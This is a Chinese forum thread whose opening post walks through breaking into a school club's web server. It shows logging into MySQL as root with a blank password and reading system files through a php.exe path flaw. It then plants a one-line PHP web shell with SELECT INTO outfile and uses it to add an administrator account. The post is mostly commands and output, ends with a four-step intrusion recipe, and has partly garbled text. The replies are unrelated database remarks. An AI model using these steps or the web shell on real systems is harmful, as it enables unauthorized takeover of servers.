仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 885|回复: 8
打印 上一主题 下一主题

[学习教程] MYSQL编程:看紧你的3306端口,一次经由过程mysql的进侵...

[复制链接]
金色的骷髅 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 22:34:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
DBaaS会导致单一客户利润率的下降,因为云服务一般是依靠MySQL学习教程数来抵消较低的利润率。mysql用superscan扫了一下
某个c类的网段,寻觅开放80端口的呆板,了局就只要一台呆板
开放了80端口,试着连了一下,是我们黉舍某个社团的的主页。
从端口的banner来看应当是apache(win32),证明一下
telnet211.87.xxx.xxx
get(回车)
<!DOCTYPEHTMLPUBLIC"-//IETF//DTDHTML2.0//EN">
<HTML><HEAD>
<TITLE>501Method
NotImplemented</TITLE>
</HEAD><BODY>
<H1>MethodNotImplemented</H1>
getto/index
.htmlnotsupported.<P>
Invalidmethodinrequestget<P>
<HR>
<ADDRESS>Apache/1.3.2
2Serveratwww.xxxxxx.comPort80</ADDRESS>
</BODY></HTML>

丢失对主机的毗连。
C:>
呵呵,这下看得更分明了
据我推测,应当是"apache+mysql+php"的黄金组合吧
习气性的mysql-h211.87.xxx.xxx
公然连上了
WelcometotheMySQLmonitor.Commandsendwithorg.
YourMySQLconnectionidis17toserverversion:3.23.53-max-nt

Typehelp;orhforhelp.Typectoclearthebuffer.

mysql>

断开试着
mysql-h211.87.xxx.xxx-uroot-p
password:
WelcometotheMySQLmonitor.Commandsendwithorg.
YourMySQLconnectionidis18toserverversion:3.23.53-max-nt

Typehelp;orhforhelp.Typectoclearthebuffer.

mysql>
呵呵,人人看到了他的root用户没有暗码,这是我明天要说的第一个主题。
这是相称的伤害的,遇见这类情形,有99.999%的大概能够进进
既然利用的apache+php,只需找到他在当地寄存的web的物理路径就随心所欲了
呵呵
下一个成绩是我明天要说的重点怎样才干晓得那台主机的寄存的web的物理路径?
办法有良多种,在这里我先容2种办法供初学者参考
起首要告知人人的是低版本的apache+php有一个毛病
http://xxx.xxxx.xxx.xxx/php/php.exe?对方的物理文件名
就能够把谁人物理文件下载上去。

因而提http://211.87.xxx.xxx/php/php.exe?c:a.txt
前往
Noinputfilespecified.(没有这个毛病的话提醒找不到网页)
好的,这申明他有这个毛病。
在提http://211.87.xxx.xxx/php/php.exe?c:oot.ini
前往
[bootloader]timeout=30default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS[operating

systems]multi(0)disk(0)rdisk(0)partition(1)WINDOWS="MicrosoftWindowsXPProfessional"

/fastdetect
呵呵,装的仍是xp。
好了,我们能够推测对方apache的conf文件的物理地位了
http://211.87.xxx.xxx/php/php.exe?c:apacheconfhttpd.conf
Noinputfilespecified.
http://211.87.xxx.xxx/php/php.exe?d:apacheconfhttpd.conf
Noinputfilespecified.
http://211.87.xxx.xxx/php/php.exe?e:apacheconfhttpd.conf
Noinputfilespecified.
http://211.87.xxx.xxx/php/php.exe?c:ProgramFilesapacheconfhttpd.conf
Noinputfilespecified.
http://211.87.xxx.xxx/php/php.exe?f:apacheconfhttpd.conf
猜到了,前往了很多多少器材
找到我们想要的
#DocumentRoot:Thedirectoryoutofwhichyouwillserveyour
#documents.Bydefault,allrequestsaretakenfromthisdirectory,but
#symboliclinksandaliasesmaybeusedtopointtootherlocations.
#
DocumentRoot"D:homepage"
看得出来对方的主目次是D:homepage
上面的事就好办了,如今就想失掉shell?
先别急,我们先来看看另外一种办法
那就是使用mysql的毛病
任意的扫瞄一下他的网页找到一处使用mysql的中央
http://211.87.xxx.xxx/skonline/study/list.php?id=14

长得太帅了,哈哈哈哈
提交
http://211.87.xxx.xxx/skonline/study/list.php?id=14
前往
Warning:SuppliedargumentisnotavalidMySQLresultresourcein

d:homepageskonlinestudylist.phponline231
呵呵,一清二楚。
然后,然后就是打造我们的shell
mysql-h211.87.xxx.xxx-uroot-p
password:
WelcometotheMySQLmonitor.Commandsendwithorg.
YourMySQLconnectionidis18toserverversion:3.23.53-max-nt

Typehelp;orhforhelp.Typectoclearthebuffer.

mysql>usetest;
Databasechanged
mysql>createtablet(cmdtext);
QueryOK,0rowsaffected(0.08sec)

mysql>insertintotvalues(<?system($c);?>);
QueryOK,1rowaffected(12.52sec)

mysql>select*fromtintod:homepage        est.php;

我的shell很复杂<?system($c);?>,不到20个字符,但他已充足了
可让我实行恣意命令,由此足以看出php的壮大。

怎样用?
提交
http://211.87.xxx.xxx/test.php?c=net;userkid/add
命令乐成完成
http://211.87.xxx.xxx/test.php?c=net;localgroupadministratorskid/add
命令乐成完成

呵呵,测试乐成,经由过程!
剩下的就是你自在发扬了。

由此我们不难总结出这一类的进侵步骤:
1,找到没有暗码的3306端口
2,找到对方的web物理路径
3,打造shell
4,后续事情
<P>
呵呵,在这里提示人人,假如你想要或正在用mysql的时分
万万要给本人的root设上一个强无力的密首先我们要知道,或许有一项技术存在很多理由让我们可以选择使用MySQL学习教程,但是让我们不使用它往往只要有一个理由就足够了。
金色的骷髅 该用户已被删除
沙发
 楼主| 发表于 2015-1-19 16:54:41 来自手机 | 只看该作者
这是一个不错的新特性。虽然索引的附加字段没有索引键值效率高,但是相对映射到数据表中效率还是提高了很多。我做过试验,在我的实验环境中会比映射到表中提高30%左右的效率。
深爱那片海 该用户已被删除
板凳
发表于 2015-1-28 05:11:19 | 只看该作者
外键的级联更能扩展可能大部分的同行在设计OLTP系统的时候都不愿意建立外键,都是通过程序来控制父子数据的完整性。
admin 该用户已被删除
地板
发表于 2015-2-5 13:31:22 | 只看该作者
一直以来个人感觉SQLServer的优化器要比Oracle的聪明。SQL2005的更是比2k聪明了不少。(有次作试验发现有的语句在200万级时还比50万级的相同语句要快show_text的一些提示没有找到解释。一直在奇怪。)
冷月葬花魂 该用户已被删除
5#
发表于 2015-2-11 21:20:18 | 只看该作者
作了些试验,发现使用CLR的存储过程或函数在达到一定的阀值的时候,系统性能会呈指数级下滑!这是非常危险的!只使用几个可能没有问题,当一旦大规模使用会造成严重的系统性能问题!
6#
发表于 2015-3-2 19:44:28 | 只看该作者
同样会为索引视图等应用带来麻烦。看看行级和事务级的快照数据放在tempdb中,就能感觉到目前架构的尴尬。
活着的死人 该用户已被删除
7#
发表于 2015-3-11 05:56:54 | 只看该作者
多走走一此相关论坛,多看一些实例开发,多交流0经验,没什么的,我也是刚学没多久!加油
海妖 该用户已被删除
8#
发表于 2015-3-17 22:08:11 | 只看该作者
然后最好有实践机会,能够把实践到的和实践结合起来,其实理论思考是个非常困扰和痛苦的事情
第二个灵魂 该用户已被删除
9#
发表于 2015-3-25 03:45:37 | 只看该作者
索引视图2k就有。但是2005对其效率作了一些改进但是schema.viewname的作用域真是太限制了它的应用面。还有一大堆的环境参数和种种限制都让人对它有点却步。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-22 20:45

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表